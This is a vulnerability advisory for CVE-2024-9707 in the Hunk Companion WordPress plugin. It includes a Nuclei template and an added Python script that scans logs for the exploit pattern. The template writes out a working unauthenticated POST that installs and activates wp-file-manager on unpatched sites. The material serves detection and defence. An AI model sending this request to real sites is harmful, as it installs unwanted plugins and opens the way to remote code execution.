The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.
PoC code [publicly available]
id: CVE-2024-9707

info:
  name: Hunk Companion <= 1.8.4 - Arbitrary Plugin Installation
  author: DhiyaneshDK
  severity: critical
  description: |
    The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.
  reference:
    - https://wordpress.org/plugins/hunk-companion/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9c101fca-037c-4bed-9dc7-baa021a8b59c?source=cve
    - https://github.com/iSee857/CVE-PoC/blob/main/WordPress_Hunk_Companion(CVE-2024-9707).py
    - https://github.com/RandomRobbieBF/CVE-2024-9707
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9707
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9707
    cwe-id: CWE-862
    epss-score: 0.87009
    epss-percentile: 0.99404
    cpe: cpe:2.3:a:themehunk:hunk_companion:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: themehunk
    product: hunk_companion
    framework: wordpress
    fofa-query: body="/wp-content/plugins/hunk-companion/"
  tags: cve,cve2024,wp,wp-plugin,wordpress,hunk-companion,intrusive,vkev

http:
  - raw:
      - |
        POST /wp-json/hc/v1/themehunk-import HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params": {"templateType": "free", "plugin": {"wp-file-manager": "Wp File Manager"}, "allPlugins": [{"wp-file-manager": "wp-file-manager/wp-file-manager.php"}], "builder": "gogo", "themeSlug": "gogo", "proThemePlugin": "wp-file-manager", "tmplFreePro": "plugin", "wpUrl": "https://downloads.wordpress.org/", "thUrl": "https://themehunk.com/wp/data/"}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"\"https:\\\/\\\/'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ab6c699890063a380c0c92d69fddafe0c4e54de5e0b9e85fc657a52609905c030221009ead9a4ad420feb2195daead88b5dbe1d5879ef396c04884fff6e96729763f1e:922c64590222798bb761d5b6d8e72950
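Detection-side triage for the advisory above, as an added example that is not part of the advisory, the Nuclei template or the Hunk Companion plugin's own code. It scans combined-format web-server access logs for requests to the vulnerable REST route (a POST answered with 2xx is the pattern the template above produces against an unpatched site) and, where a WAF or reverse proxy captures request bodies, pulls the requested plugin slugs and the download hosts (wpUrl, thUrl) out of a body shaped like the one in the template. The log lines and the body are constructed sample data; the combined log format, the allow-list of download hosts and the severity rating are assumptions made for the example.

```python
"""Triage helpers for the CVE-2024-9707 request pattern (added example).

Assumes access logs in the common "combined" format and, for body
inspection, the JSON shape from the advisory's request: a top-level
"params" object carrying "plugin", "allPlugins", "wpUrl" and "thUrl".
"""
import json
import re
from typing import Dict, List
from urllib.parse import urlparse

# REST route named in the advisory (CVE-2024-9707).
VULN_ENDPOINT = "/wp-json/hc/v1/themehunk-import"

# Combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2024:10:01:02 +0000] "GET /wp-json/hc/v1/themehunk-import HTTP/1.1" 404 48
203.0.113.7 - - [10/Dec/2024:10:02:11 +0000] "POST /wp-json/hc/v1/themehunk-import HTTP/1.1" 200 512
198.51.100.9 - - [10/Dec/2024:10:03:15 +0000] "POST /wp-json/wp/v2/posts HTTP/1.1" 401 120
203.0.113.7 - - [10/Dec/2024:10:03:40 +0000] "POST /wp-json/hc/v1/themehunk-import?_=1 HTTP/1.1" 200 512
"""


def find_import_hits(log_text: str) -> List[Dict[str, str]]:
    """Return one record per request that touched the vulnerable route.

    A POST answered with 2xx is rated "high": on an unpatched site that is
    the combination the advisory describes (the install/activate request
    was accepted). Anything else on the route is "info" for correlation.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = m.group("path").split("?", 1)[0]  # ignore any query string
        if path != VULN_ENDPOINT:
            continue
        status = int(m.group("status"))
        high = m.group("method") == "POST" and 200 <= status < 300
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "method": m.group("method"),
            "status": str(status),
            "severity": "high" if high else "info",
        })
    return hits


# Body with the shape of the advisory's request, constructed for the example.
SAMPLE_BODY = json.dumps({"params": {
    "templateType": "free",
    "plugin": {"wp-file-manager": "Wp File Manager"},
    "allPlugins": [{"wp-file-manager": "wp-file-manager/wp-file-manager.php"}],
    "builder": "gogo", "themeSlug": "gogo",
    "proThemePlugin": "wp-file-manager", "tmplFreePro": "plugin",
    "wpUrl": "https://downloads.wordpress.org/",
    "thUrl": "https://themehunk.com/wp/data/",
}})


def _params(body: str) -> dict:
    """Parse the "params" object out of a captured body; {} if malformed."""
    try:
        params = json.loads(body).get("params", {})
    except (ValueError, AttributeError):
        return {}
    return params if isinstance(params, dict) else {}


def requested_plugins(body: str) -> List[str]:
    """Plugin slugs a captured body asks the endpoint to install/activate.

    Slugs come from "plugin" (slug -> display name) and from each entry of
    "allPlugins" (slug -> main plugin file).
    """
    params = _params(body)
    slugs = set(params.get("plugin") or {})
    for entry in params.get("allPlugins") or []:
        if isinstance(entry, dict):
            slugs.update(entry)
    return sorted(slugs)


def unexpected_download_hosts(body: str,
                              allowed=("downloads.wordpress.org", "themehunk.com")) -> List[str]:
    """Hosts named in wpUrl/thUrl that are not on the allow-list.

    The request body carries download URLs, so a body pointing anywhere
    other than the two hosts seen in the advisory's request is worth
    escalating on its own. The allow-list is an assumption.
    """
    params = _params(body)
    hosts = []
    for key in ("wpUrl", "thUrl"):
        host = urlparse(str(params.get(key, ""))).hostname
        if host and host not in allowed:
            hosts.append(host)
    return hosts


if __name__ == "__main__":
    for hit in find_import_hits(SAMPLE_LOG):
        print(hit)
    print("plugins requested:", requested_plugins(SAMPLE_BODY))
    print("off-list hosts:", unexpected_download_hosts(SAMPLE_BODY))
```

Run against real logs by piping the access log into `find_import_hits`; the "high" records are the ones to correlate with a fresh plugin directory under wp-content/plugins and with activation entries in the site's audit log. Patching to a version after 1.8.4 removes the exposure; the log check remains useful for finding attempts made before the patch.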